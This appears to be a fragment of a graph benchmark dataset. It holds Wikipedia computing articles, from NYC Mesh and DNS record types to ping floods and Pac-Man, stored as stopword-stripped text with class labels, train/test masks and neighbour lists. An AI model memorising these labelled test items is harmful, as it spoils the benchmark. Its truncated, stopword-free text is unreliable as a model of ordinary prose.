    "text": "NYC_Mesh:nyc mesh nyc mesh physical network interconnected routers group enthusiasts working support expansion project freely accessible open wireless community network nyc mesh internet service provider isp although connect internet offer internet access service members network includes 200 active member nodes throughout five boroughs concentrations users lower manhattan brooklyn goal nyc mesh build large scale decentralized digital network owned run eventually cover new york city neighboring urban areas participation project governed network commons license agreement partially modeled similar license use guifi.net lists four key tenets similar projects include freifunk germany ninux italy sarantaporo.gr greece people open network oakland ca red hook wi-fi brooklyn ny like many free community-driven networks nyc mesh uses mesh technology facilitate robustness resiliency additionally larger nodes project uses border gateway protocol bgp nodes connected via wifi links similar used wireless routers homes powerful routers able function backbone making connections distances mile nyc mesh founded 2012 originally based cjdns protocol 2015 project received grant isoc-ny new york chapter internet society nyc mesh connects internet via de-cix internet exchange point ixp first super node sabey data center 375 pearl street project received membership boost due u.s. federal communications commission vote december 2017 repeal 2015 net neutrality rules coinciding decision average number member sign-ups requests per month jumped 20 400",
    "neighbors": [
      7232,
      10021,
      1733,
      9098,
      11483
    ],
    "mask": "Train"
  },
  {
    "node_id": 3017,
    "label": 3,
    "text": "Freescale_DragonBall:freescale dragonball motorola/freescale semiconductor dragonball mc68328 microcontroller design based famous 68000 core implemented all-in-one low-power system handheld computer use supported μclinux designed motorola hong kong released 1995 dragonball major design win earlier versions palm computing platform however palm os 5 onwards superseded arm-based processors texas instruments intel processor also used alphasmart line portable word processors examples include dana dana wireless processor capable speeds 16.58 mhz run 2.7 mips million instructions per second base 68328 dragonball ez mc68ez328 model extended 33 mhz 5.4 mips dragonball vz mc68vz328 model 66 mhz 10.8 mips dragonball super vz mc68sz328 32-bit processor 32-bit internal external address bus 24-bit external address bus ez vz variants 32-bit data bus many built-in functions like color grayscale display controller pc speaker sound serial port uart irda support uart bootstrap real time clock able directly access dram flash rom mask rom built-in support touch screens all-in-one computer chip dragonball ez palm handhelds twice many ics recent dragonball mx series microcontrollers later renamed freescale i.mx mc9328mx/mcimx series intended similar application earlier dragonball devices based arm processor core instead 68000 core",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      6790,
      7302,
      7305,
      10500,
      3467,
      1548,
      10501,
      6415,
      3606,
      8982,
      2073,
      7065,
      8102,
      5164,
      5297,
      11314,
      9013,
      11447,
      8761,
      6715,
      1983,
      10945,
      5318,
      8268,
      9037,
      336,
      8530,
      3540,
      3932,
      3936,
      4449,
      7269,
      9964,
      8048,
      3185,
      10224,
      5235,
      7286,
      3319,
      8952,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3018,
    "label": 5,
    "text": "List_of_DNS_record_types:list dns record types list dns record types overview resource records rrs permissible zone files domain name system dns also contains pseudo-rrs types records simply provide types information example hinfo record gives description type computer/os host uses others return data used experimental features type field also used protocol various operations progress rendered originally defined record-types obsolete records listed iana limited use various reasons marked obsolete list obscure services older versions services special notes saying right",
    "neighbors": [
      8224,
      5470,
      8130,
      7908,
      1989,
      10341,
      2887,
      5166,
      3826,
      11250,
      9909,
      3898,
      8283,
      8956,
      5469,
      3742
    ],
    "mask": "Test"
  },
  {
    "node_id": 3019,
    "label": 5,
    "text": "Real_Data_Transport:real data transport real data transport rdt proprietary transport protocol actual audio-video data developed realnetworks 1990s commonly used companion control protocol streaming media like ietf real time streaming protocol rtsp non-proprietary alternative rdt ietf real-time transport protocol rtp also implemented realnetworks players reported 2002 book firewalls rdt used two unidirectional udp connections one data sent server client another opposite direction retransmission requests book reported realnetworks g2 server used rdt configuration default another 2003 book reported rdt also seen carried transmission control protocol tcp fall-back mechanism rdt included part helix community project",
    "neighbors": [
      9380,
      9381,
      10924,
      11413,
      4219,
      10270
    ],
    "mask": "Test"
  },
  {
    "node_id": 3020,
    "label": 3,
    "text": "Dizzy_Down_the_Rapids:dizzy rapids dizzy rapids arcade style action video game published 1991 codemasters amstrad cpc spectrum dos atari st commodore 64 amiga developed harmony gold tatsunoko production published 1993 toshiba miramax communications msx2 game involves dizzy riding barrels river avoiding obstacles enemies another game derived minigame game found fantastic adventures dizzy like bubble dizzy game based game play arcade game titled toobin c64 version developed first paul black c64 version originally clone toobin called 'toobin turles game taken codemasters consideration rebranded take advantage dizzy character",
    "neighbors": [
      9006,
      10931,
      2718
    ],
    "mask": "Test"
  },
  {
    "node_id": 3021,
    "label": 4,
    "text": "CERT_C_Coding_Standard:cert c coding standard sei cert c coding standard software coding standard c programming language developed cert coordination center improve safety reliability security software systems guidelines cert c secure coding standard cross-referenced several standards including common weakness enumeration cwe entries misra",
    "neighbors": [
      7337,
      2709,
      6423,
      5404,
      575
    ],
    "mask": "Test"
  },
  {
    "node_id": 3022,
    "label": 9,
    "text": "Programming_language_reference:programming language reference programming language reference language reference manual artifact describes programming language users developers understand basic elements write computer programs target language programming language reference manual one form documentation associated mainstream programming languages reference manual ordinarily separate distinct programming language specification usually detailed intended use implementors language rather simply use language accomplish processing task",
    "neighbors": [
      11625,
      11490,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 3023,
    "label": 2,
    "text": "Netgear_WNR3500L:netgear wnr3500l wnr3500l also known wnr3500u 802.11b/g/n wi-fi router created netgear officially launched autumn 2009 wnr3500l runs open-source linux firmware supports installation third party packages dd-wrt tomato version 1 version 2 several ways identify version including v2 label version 2 version 1 version 2 according one analysis installing dd-wrt reduced performance",
    "neighbors": [
      2945,
      5470,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3024,
    "label": 4,
    "text": "Ping_flood:ping flood ping flood simple denial-of-service attack attacker overwhelms victim icmp echo request ping packets effective using flood option ping sends icmp packets fast possible without waiting replies implementations ping require user privileged order specify flood option successful attacker bandwidth victim instance attacker dsl line victim dial-up modem attacker hopes victim respond icmp echo reply packets thus consuming outgoing bandwidth well incoming bandwidth target system slow enough possible consume enough cpu cycles user notice significant slowdown flood ping also used diagnostic network packet loss throughput issues",
    "neighbors": [
      9024,
      1121,
      2409,
      4495,
      6735,
      4689,
      8692,
      10996,
      4054,
      5402,
      2299,
      700,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3025,
    "label": 3,
    "text": "Apulet:apulet apulet plural apulettes component cell computer architecture consisting bundle comprising data object code necessary perform action upon cell architecture calls several apus attached processing units primary processing system control single processing element pe apu loaded apulet pe pass results next apu",
    "neighbors": [
      9472,
      643,
      9126,
      6311,
      306,
      7218,
      6072,
      8120,
      1985,
      9932,
      6738,
      342,
      1115,
      859,
      4060,
      3677,
      9445,
      8937,
      10985,
      4587,
      6004,
      2293,
      1784,
      3323,
      6268,
      6909
    ],
    "mask": "Test"
  },
  {
    "node_id": 3026,
    "label": 4,
    "text": "National_Strategy_for_Trusted_Identities_in_Cyberspace:national strategy trusted identities cyberspace national strategy trusted identities cyberspace nstic us government initiative announced april 2011 improve privacy security convenience sensitive online transactions collaborative efforts private sector advocacy groups government agencies organizations strategy imagined online environment individuals organizations trust identify authenticate digital identities digital identities organizations devices promoted offer mandate stronger identification authentication protecting privacy limiting amount information individuals must disclose strategy developed input private sector lobbyists including organizations representing 18 business groups 70 nonprofit federal advisory groups comments dialogue public strategy four guiding principles nstic described vision compared ecosystem individuals businesses organizations enjoy greater trust security conduct sensitive transactions online technologies policies agreed upon standards would securely support transactions ranging anonymous fully authenticated low high value imagined world implementation included three initiatives nstic announced presidency barack obama near end first term april 15 2011 magazine article said individuals might validate identities securely sensitive transactions banking viewing health records let stay anonymous blogging surfing web january 2011 u.s. department commerce established national program office npo led national institute standards technology help implement nstic coordinate implementation activities federal agencies npo works white house cybersecurity coordinator originally howard schmidt 2012 michael daniel nstic called steering group led private sector administer development adoption framework identity ecosystem steering group idesg held meeting chicago august 15–16 2012 meeting brought together 195 members person 315 members remotely additional plenary meetings phoenix arizona santa clara california boston massachusetts grant 2012 2014 trusted federal systems inc. group administrative body federal government initiated supported pilot programs 2012 nstic awarded 9 million pilot projects first year example american association motor vehicle administrators developing demonstration commercial identity provider credentials virginia state government including securely verifying identities online virginia department motor vehicles internet2 received 1.8 million research id.me given two-year grant 2013 work funded nist trusted identities group web page nstic called u.s. federal government agencies early adopters identity ecosystem envisioned nstic agencies struggled implement services provide internally externally technical policy cost barriers made challenging accept third-party credential providers accredited federal identity credential access management ficam initiative response white house created federal cloud credential exchange fccx team co-chaired nstic general services administration team consisted representatives agencies whose applications accessed large population external customers november 2012 united states postal service chosen manage pilot version fccx awarded contract build securekey technologies member fido alliance contract renewed may 2015 connect.gov launched december 2014 manifestation pilot first two companies provide individual us citizens identity management services compatible connect.gov id.me verizon ping identity forgerock first software platforms provide ficam-compliant credentials enable private sector organizations connect securely government agencies primary objective project may 10 2016 18f announced blog entry connect.gov would replaced replacement system would called login.gov launched april 2017 identity ecosystem steering group idesg received start funding nist 2010 since created series documents available web site 2016 introduced identity ecosystem framework idef registry self-assessment proposal generated criticism since released draft form june 2010 much centered around privacy implications proposal shortly draft release electronic privacy information center epic consumer-rights civil liberties organizations sent committee statement response draft nstic policy requesting clearer complete plan create safeguard internet users rights privacy epic head marc rotenberg called nstic historic also cautioned ... online identity complex problem risk 'cyber-identity theft consolidated identity systems real us need protect online privacy nstic addressed early privacy concerns 2013 fair information practice principles document subsequent initiatives sought advance privacy example american civil liberties union electronic frontier foundation involved privacy committee idesg",
    "neighbors": [
      1312,
      6308,
      8807,
      5918,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 3027,
    "label": 3,
    "text": "Timer_coalescing:timer coalescing timer coalescing computer system energy-saving technique reduces central processing unit cpu power consumption reducing precision software timers allow synchronization process wake-ups minimizing number times cpu forced perform relatively power-costly operation entering exiting idle states",
    "neighbors": [
      5922,
      5348,
      518,
      651,
      3211,
      6797,
      1776,
      3294
    ],
    "mask": "Test"
  },
  {
    "node_id": 3028,
    "label": 3,
    "text": "ZPU_(microprocessor):zpu microprocessor zpu microprocessor stack machine designed norwegian company zylin run supervisory code electronic systems include field-programmable gate array fpga zpu relatively recent stack machine small economic niche growing number users implementations designed require small amounts electronic logic making electronic logic available purposes fpga make easily usable port gnu compiler collection makes much easier apply cpus without compilers sacrificing speed exchange small size keeps intermediate results calculations memory push-down stack rather registers zylin corp. made zpu open-source 2008 many electronic projects include electronic logic fpga wasteful also microprocessor commonplace add cpu electronic logic fpga often smaller less-expensive fpga could used cpu used less resources exact situation zpu designed address zpu designed handle miscellaneous tasks system best handled software example user interface zpu slow small size helps place needed high-speed algorithm fpga another issue cpus fpgas closed-source available particular maker fpgas occasionally project needs design widely distributed security inspections educational uses reasons licenses proprietary cpus prevent uses zpu open-sourced projects need code must small run cpu inherently larger code alternatively project may benefit wide selection code compilers debugging tools gnu compiler collection cases emulator written implement zpu instruction set target cpu zpu compilers used produce code resulting system slow packs code less memory many cpus enables project use wide variety compilers code zpu designed explicitly minimize amount electronic logic minimal instruction set yet encoded gnu compiler collection also minimizes number registers must fpga minimizing number flip-flops instead registers intermediate results kept stack memory also small code saving memory stack machine instructions need contain register ids zpu code smaller risc cpus said need 80 space arm holdings thumb2 example signed immediate helps zpu store 32-bit value 5 bytes instruction space little one risc cpus require least eight bytes finally 2/3 instructions emulated firmware implemented using 1/3 required instructions although result slow resulting cpu require little 446 lookup-tables measure fpga complexity roughly equivalent 1700 electronic logic gates zpu reset vector consisting 32-bytes code space starting location zero also single edge-sensitive interrupt vector consisting 32 bytes code space beginning address 32 vectors 2 63 32 bytes space reserved code emulate instructions 33 63 base zpu 32-bit data path zpu also variant 16-bit-wide data path save even logic zpu well-tested port gnu compiler collection enthusiasts firmware engineers ported ecos freertos μclinux least one group enthusiasts copied popular development environment arduino adapted zpu multiple models zpu core besides original zylin cores also zpuino cores zpuflex core zylin core designed minimal fpga footprint includes 16-bit version zpuino practical improvements speed replace emulated instructions hardware embedded system-on-chip framework zpuflex designed use external memory blocks replace emulated instructions hardware academic projects include power efficiency studies improvements reliability studies improve speed implementors implemented emulated instructions added stack cache beyond one implementor said two-stack architecture would permit pipelining i.e improving speed one instruction per clock cycle might also require compiler changes one implementor reduced power usage 46 stack cache automated insertion clock gating power usage roughly equivalent small open-source amber core implements arm v2a architecture parts zpu would aided fault-tolerance address bus stack pointer program counter tos abbreviation top stack nos abbreviation next top stack code points 33 63 may emulated code vectors 2 32 loadh storeh 16-bit memory access lessthan comparisons set 1 true 0 false lessthanorequal ulessthan ulessthanorequal swap tos nos mult lshiftright ashiftleft ashiftright call eq neq neg sub xor loadb storeb 8-bit memory access div mod eqbranch neqbranch poppcrel config pushpc syscall pushspadd halfmult callpcrel",
    "neighbors": [
      659
    ],
    "mask": "None"
  },
  {
    "node_id": 3029,
    "label": 3,
    "text": "Bruce_Lee_(video_game):bruce lee video game bruce lee video game designed ron j. fortier graphics kelly day music john a. fitzpatrick originally developed atari 8-bit family published 1984 datasoft along ports apple ii commodore 64 bruce lee platform game hybrid player controls bruce lee second player controls either yamo alternates player one control bruce lee game converted zx spectrum amstrad cpc published u.s. gold msx version published 1985 comptiq plot involves eponymous martial artist advancing chamber chamber wizard tower seeking claim infinite wealth secret immortality twenty chambers represented single screen platforms ladders progress player must collect number lanterns suspended various points chamber chambers guarded two mobile enemies ninja attacks bokken stick green yamo large unarmed warrior visually styled sumo wrestler attacking punches crushing kicks platforms sufficient graphics support yamo skin actually pictured green though cover art natural human skin tone multiplayer mode allows second player control yamo allow two players alternately control bruce player playing yamo inactive certain time computer takes ninja yamo also vulnerable screen dangers infinite lives always return whereas yamo consistently identified single person one version manual implies reappearance ninja new individual replacing previous one later chambers include hazards mines moving walls well comb-like surface electric spark racing along skilful walking climbing ducking jumping required negotiate twentieth screen lee finally faces evil fire wizard zx spectrum version bruce lee received enthusiastic reviews computer gaming world stated game delivers foot kicking kick jabbing quick ducking action-packed adventure 'd expect good grade b martial arts movie crash magazine awarded 91 highlighting zesty graphics enjoyable fighting action addictivity sinclair user also found game enjoyable awarding 4 5 stars felt sound underused larger variety tasks could included spectrum critical pointing takes games complete 20 chambers 1990 retrospective sinclair found bruce lee still easy complete graphics aged well addition felt fighting moves available player lacked impact limited beat 'em however described historically important game first combine platform/collection beat 'em 'up genres home computing weekly praised graphics movement september 9 2018 speedrun game completion time 5m42s recorded zx spectrum via youtube livestream using original 128k model accepted speedrun.com fastest completion runs games located speedrun also available see youtube game included 1986 compilation sold million ii along match point match day knight lore",
    "neighbors": [
      5820,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 3030,
    "label": 5,
    "text": "Eggdrop:eggdrop eggdrop popular irc bot oldest still maintained originally written robey pointer december 1993 help manage protect efnet channel gayteen one eggdrop bot version named valis eggdrop originally intended help manage protect channels takeover attempts forms irc war bot written c programming language features interfaces c modules tcl scripts allow users enhance functionality bot large number tcl scripts available expand bot functionality written eggdrop users scripts available add extend support online games stats user channel management information storage lookup greeting channel members tracking last seen times botnet management anti-spam file serving distribution usually via dcc protocol irc services similar chanserv nickserv much eggdrop includes built-in support sharing user information channel bans however script required simultaneously control multiple bots bots coordinate channel management modes bot also features botnet allows multiple bots linked together share data act coordinated fashion botnet supports party line accessible via dcc chat telnet people communicate within botnet various channels equivalent miniature irc channel 0 default referred party line years eggdrop become one popular bots run irc users",
    "neighbors": [
      5760,
      3969,
      5251,
      6797,
      4883,
      5397,
      9630,
      546,
      3362,
      7983,
      2864,
      692,
      7861,
      5316,
      9930,
      1101,
      8909,
      5199,
      6993,
      2387,
      8147,
      7384,
      10971,
      10851,
      9320,
      2409,
      11112,
      5612,
      2804,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3031,
    "label": 2,
    "text": "Operating_System_Projects:operating system projects osp environment operating system projects teaching operating system designed provide environment introductory course operating systems selectively omitting specific modules operating system students re-implement missing functionality instructor generate projects require students understand fundamental operating system concepts distribution includes osp project generator used package project produce stubs files empty except required components compiled files students must implement osp includes simulator student code runs",
    "neighbors": [
      5452,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3032,
    "label": 4,
    "text": "Blue_Frog:blue frog blue frog freely-licensed anti-spam tool produced blue security inc. operated part community-based system tried persuade spammers remove community members addresses mailing lists automating complaint process user spam received blue security maintained addresses hashed form intrude registry spammers could use free tools clean lists tool discontinued community members reported spam blue security analyzed make sure met guidelines reported sites sending illegal spam isps hosted could contacted willing work anti-spam groups law-enforcement authorities attempt get spammer cease desist measures failed blue security sent back set instructions blue frog client client software used instructions visit leave complaints websites advertised spam messages spam message user received blue frog client would leave one generic complaint including instructions remove blue security users future mailings blue security operated assumption community grew flow complaints tens hundreds thousands computers would apply enough pressure spammers clients convince stop spamming members blue security community blue frog software included firefox internet explorer plugin allowing gmail hotmail yahoo mail e-mail users report spam automatically users could also report spam desktop email applications microsoft office outlook outlook express mozilla thunderbird users downloaded free blue frog software registered e-mail addresses intrude registry user could protect ten addresses one personal dns domain name blue frog available free add-on within firetrust mailwasher anti-spam filter also compatible spamcop tool different spam-fighting methods blue security released software products including blue frog open-source developer community could review modify enhance may 1 2006 blue frog members started receive intimidating e-mail messages sources claiming software actually collecting personal details identity theft ddos attacks creating spam database purposes blue security contested claims may 2006 blue security company subject retaliatory ddos attack initiated spammers servers folded load blue security redirected dns entries point company weblog announcing difficulty company weblog hosted blogs.com webportal subsidiary six apart effectively redirected attack blogs.com caused six apart server farm collapse turn said made 2,000 blogs unreachable several hours individuals claiming members computer security establishment condemned blue security company action took ddos attack representative renesys likened action pushing burning couch house neighbor defense blue security inc. stated aware ddos attack made dns change claiming blackholed isolated israeli network result social engineering hack alleged pulled one attackers high-tier isp tech support staff claim disputed many writers todd underwood writer renesys blog sources however agree regardless whether blue security blackholed seem facing attack time redirected web address blue security also claimed remained amicable terms six apart pointed fact blog hosting company blame even name press release explained service outage event action widely reported security websites possibly damaging blue security reputation within community time incident broad reporting general-interest media considered many boon notoriety blue security blue frog project security expert brian krebs gives different reason blue security website unavailable article washington post says happened blue security lying unable receive http requests servers saying black hole filtered maliciously re-directed traffic rather actually unable receive traffic due attack dns servers makes probable essentially telling truth ceo eran reshef simply misinformed users unable reach site users accused blue frog malware mozilla chat forums claiming blue frog spammed signatures yahoo gmail accounts left active remnants operating system uninstalling hinted actual reason blue frog existence accumulating do-not-spam database harvest fresh addresses spammers deluge blue frog shut one week forum thread appeared blue security recast collactive would accused spamming soon attack started blue security ceo eran reshef claimed identified attacker pharmamaster quoted writing blue found right solution stop spam ca n't let continue icq conversation blue security prime suspects distributed denial service ddos attack blue security servers identified rokso database christopher brown aka swank aka dollar partner joshua burch aka zmack unidentified australians russians russian/americans notably leo kuvayev alex blood also involved suspects identified transcript postings special ham forum spam attacks ddos attack planned blue security ceased operation may 16 2006 company announced look non-spam related uses technology company investors expressed full support company decision change business plan many users suggested continuing project goals decentralized manner specifically using peer-to-peer technology client distributed via bittorrent similar thus making spam processing client distribution elements harder spammers attack one program purportedly begun name okopipi though appears abandoned number users recommended users uninstall blue frog program longer useful without blue security servers active one former blue security members red dwarf wrote program called complainterator runs windows add-on several popular email clients processes spam emails produces email messages sent sites hosting spamvertised products goal inform hosting sites hopes remove spam sites thereby making difficult spammers profit spam activities",
    "neighbors": [
      3072,
      6786,
      1667,
      7044,
      10245,
      10756,
      4490,
      8202,
      9356,
      6797,
      9233,
      914,
      4863,
      4883,
      5012,
      278,
      8978,
      10392,
      1690,
      3867,
      11418,
      10141,
      8224,
      5281,
      2213,
      8998,
      9256,
      939,
      8747,
      7983,
      4272,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      8640,
      3395,
      4165,
      11461,
      2887,
      2508,
      5078,
      1495,
      3163,
      7515,
      4344,
      3941,
      4325,
      8805,
      2409,
      6762,
      107,
      1899,
      877,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 3033,
    "label": 2,
    "text": "Plymouth_(software):plymouth software plymouth bootsplash linux supporting animations using direct rendering manager drm kms driver gets packed initrd besides eye-candy plymouth also handles user interaction boot plymouth first included fedora 10 cambridge shipped november 25 2008 replaced red hat graphical boot rhgb ubuntu includes ubuntu 10.04 lts lucid lynx release shipped april 29 2010 mandriva switched splashy plymouth version adélie 2010.0",
    "neighbors": [
      8676,
      4902,
      6694,
      2955,
      7309,
      8621,
      7375,
      7983,
      8112,
      1842,
      8685,
      2804,
      8438,
      823,
      11322,
      2045,
      3550,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 3034,
    "label": 9,
    "text": "Gambit_(scheme_implementation):gambit scheme implementation gambit also called gambit-c programming language variant language family lisp variants named scheme gambit implementation consists scheme interpreter compiler compiles scheme language c makes cross-platform software conforms standards rrs rrs institute electrical electronics engineers ieee several scheme requests implementations srfis gambit released first 1988 gambit-c gambit c backend released first 1994 free open-source software released gnu lesser general public license lgpl 2.1 apache license 2.0 compiling intermediate representation case portable c chicken bigloo programs written gambit compiled common popular operating systems linux macos unix-like systems windows gerbil scheme variant scheme implemented gambit-c supports current r*rs standards common srfis state art macro module system inspired racket language termite scheme variant scheme implemented gambit-c. termite intended distributed computing offers simple powerful message passing model concurrency inspired erlang gambit compiler produces c code full integration support c++ objective-c compilers gnu compiler collection gcc thus software written gambit-c contain c++ objective-c code fully integrate corresponding libraries",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      10470,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      5397,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5029,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      10703,
      11218,
      11221,
      10712,
      3051,
      5611,
      5612,
      9714,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3035,
    "label": 2,
    "text": "I/O_Kit:i/o kit i/o kit written iokit source code sometimes elsewhere open-source framework xnu kernel helps developers code device drivers apple macos ios operating systems i/o kit framework evolved nextstep driverkit shared similarities either mac os 9 device driver framework bsd i/o kit framework implemented subset c++ omits features apple feels unsafe use multithreaded kernel exceptions multiple inheritance templates run-time type information embedded c++ chosen partly apple believed developers would comfortable writing drivers commonly used language objective-c still providing object-oriented framework allowing device driver developers focus coding features specific hardware instead reimplementing features common given device addition providing common code device drivers framework also provides power management driver stacking automatic configuration dynamic loading drivers",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      10851,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      10470,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      7057,
      9109,
      1439,
      6093,
      7118,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 3036,
    "label": 5,
    "text": "Constrained_Shortest_Path_First:constrained shortest path first constrained shortest path first cspf extension shortest path algorithms path computed using cspf shortest path fulfilling set constraints simply means runs shortest path algorithm pruning links violate given set constraints constraint could minimum bandwidth required per link also known bandwidth guaranteed constraint end-to-end delay maximum number links traversed include/exclude nodes cspf widely used mpls traffic engineering routing using cspf known constraint based routing cbr path computed using cspf could exactly computed ospf is-is could completely different depending set constraints met consider network right route computed router-a router-c satisfying bandwidth constrained x- units link cost link based hop-count i.e. 1 x 50 units cspf give path → b → c. x 55 units cspf give path → → e → c. x 90 units cspf give path → → e → f → c. cases ospf is-is result path → b → c. however link costs topology different cspf may accordingly determine different path example suppose hop count used link cost links → b b → c cost 4 case x 50 units cspf give path → → e → c. x 55 units cspf give path → → e → c. x 90 units cspf give path → → e → f → c",
    "neighbors": [
      152,
      5978,
      2206,
      686
    ],
    "mask": "Train"
  },
  {
    "node_id": 3037,
    "label": 3,
    "text": "WTX_(form_factor):wtx form factor wtx workstation technology extended motherboard form factor specification introduced intel idf september 1998 use high-end multiprocessor multiple-hard-disk servers workstations specification support major oems compaq dell fujitsu gateway hewlett-packard ibm intergraph nec siemens nixdorf umax motherboard manufacturers acer asus supermicro tyan updated 1.1 february 1999. specification discontinued url www.wtx.org longer hosts website owned intel since least 2004 form factor geared specifically towards needs high-end systems included specifications wtx power supply unit psu using two wtx-specific 24-pin 22-pin molex connectors wtx specification created standardize new motherboard chassis form factor fix relative processor location allow high volume airflow portion chassis processors positioned allowed standard form factor motherboards chassis used integrate processors demanding thermal management requirements bigger atx maximum wtx motherboard size intended provide room order accommodate higher numbers integrated components wtx computer cases backwards compatible atx motherboards vice versa sometimes came equipped atx power supplies",
    "neighbors": [
      10337,
      2500,
      455,
      7113,
      7151,
      1776,
      2161,
      10095,
      2803,
      10715,
      8730,
      9307
    ],
    "mask": "Test"
  },
  {
    "node_id": 3038,
    "label": 2,
    "text": "Application_Kit:application kit application kit usually called appkit graphical user interface toolkit macos comprises collection objective-c classes protocols used build application mac classes also used swift objective-c bridge xcode built-in functionality developing cocoa application using appkit including ability visually design user interfaces interface builder appkit along foundation core data part cocoa accordingly relies heavily patterns like reference types delegation notifications target–action model–view–controller applications bundled macos—for example finder textedit calendar preview–use appkit provide user interface appkit primarily associated macos originally developed use nextstep later openstep foundation classes protocols still use “ ns ” prefix result heritage open-source clone appkit maintained part gnustep various unix-based oses ios tvos use framework called uikit derived appkit uses many similar structures 170 classes included application kit following classes form core",
    "neighbors": [
      4544,
      2819,
      10406,
      10470,
      9225,
      9418,
      7307,
      10478,
      8303,
      7292,
      2673,
      8304,
      10512,
      2676,
      9430,
      9784,
      2556
    ],
    "mask": "None"
  },
  {
    "node_id": 3039,
    "label": 3,
    "text": "Pac-Man:pac-man development game began april 1979 directed toru iwatani nine-man team iwatani wanted create game could appeal women well men video games time war- sports-themed although inspiration pac-man character reportedly image pizza slice removed iwatani said also rounded japanese symbol kuchi meaning mouth in-game characters made cute colorful appeal younger players original japanese title puckman derived titular character hockey-puck shape pac-man widespread critical commercial success game important influential commonly listed one greatest video games time success game led several sequels merchandise two television series well hit single buckner garcia pac-man video game franchise remains one highest-grossing best-selling game series time generating 14 billion revenue 43 million sales combined character pac-man mascot flagship icon bandai namco entertainment highest brand awareness video game character north america player navigates pac-man maze dead ends maze filled pac-dots includes four roving multi-colored ghosts blinky pinky inky clyde passageway left side screen right side one energizer four quadrants bonus fruits appear level objective game accumulate many points possible eating dots fruits blue ghosts dots stage eaten stage completed player advance next stages one three intermission animations plays four ghosts roam maze chase pac-man ghosts touches pac-man life lost lives lost game player begins three lives dip switches machine change number starting lives one two five player receive one extra life bonus obtaining 10,000 points number points needed bonus life changed 15,000 20,000 disabled altogether near corners maze four flashing energizers allow pac-man eat ghosts earn bonus points enemies turn deep blue reverse direction move away pac-man usually move slowly enemy eaten eyes return center ghost box ghost regenerated normal color bonus score earned eating blue ghost increases exponentially consecutive ghost eaten single energizer active score 200 points scored eating one ghost 400 eating second ghost 800 third 1600 fourth cycle restarts 200 points pac-man eats next energizer blue enemies flash white signal return normal color become dangerous length time enemies remain vulnerable varies one stage next generally becoming shorter game progresses later stages enemies begin flashing immediately energizer consumed without solid-blue phase starting stage nineteen ghosts become edible still reverse direction fruits appear twice per level directly center ghost box eating one gives 100 5,000 points table lists stage type value fruit appears long ghosts blue energizer eaten many times ghosts flash returning normal enemies pac-man known alternately monsters ghosts creator toru iwatani designed enemy distinct personality keep game becoming impossibly difficult boring play iwatani described enemy behaviors detail 2011 game developers conference red enemy simply chases pac-man pink enemy aims position front pac-man mouth blue enemy seek position similar fixed spot pink enemy practice however blue enemy behave like three enemies although iwatani claimed orange enemy behavior random alternates behaving like red enemy distance pac-man moving towards lower-left corner maze whenever gets close pac-man designed ending however level 256 bug corrupts entire right half maze seemingly random symbols tiles overwriting values edible dots makes impossible eat enough dots complete level serving effectively final level known split screen bug caused calculation number fruit draw rolling zero code attempts draw 256 fruit 236 designed resulting maze corrupted tilemap holds fruits 20 elements long arranged three cases case handles levels less seven case b handles levels 8–19 case c handles level 19 game reaches level 256 level counter overflows back 0 thus level 256 treated level 0 game executes case rather case c level number less seven algorithm draws fruits continues draw fruit till fruit number level number match upon reaching fruit number 255 fruit number overflows back 0 matching level number 256 fruit drawn game draws first 13 fruit issues upon reaching fruit number 14 begins draw fruit right side map game reaches 20th entry fruit table game longer draw fruit still 236 fruit needs draw thus game begins draw pieces tile map onto screen substitute 236 extra fruit pac-man move pieces act like walls 256 fruit drawn game draws 7 extra blank spaces final fruit level impossible beat using one game player needs eat 244 dots move next level dots overwritten tilemap nine dots hidden within glitch screen re-spawn player dies maximum five extra lives limits number dots 168 however player able continue re-spawned dots eaten level beaten level 0 beaten player returned level 1 ghosts difficulty set high thus ghost blue time also two broken keys bottom screen one live counter one level counter disappear round beaten perfect pac-man game player achieves maximum possible score first 255 levels eating every possible dot energizer fruit enemy without losing single life using extra lives score many points possible level 256 first person credited achieving score 3,333,360 points esports player billy mitchell claimed perform feat six hours 1999 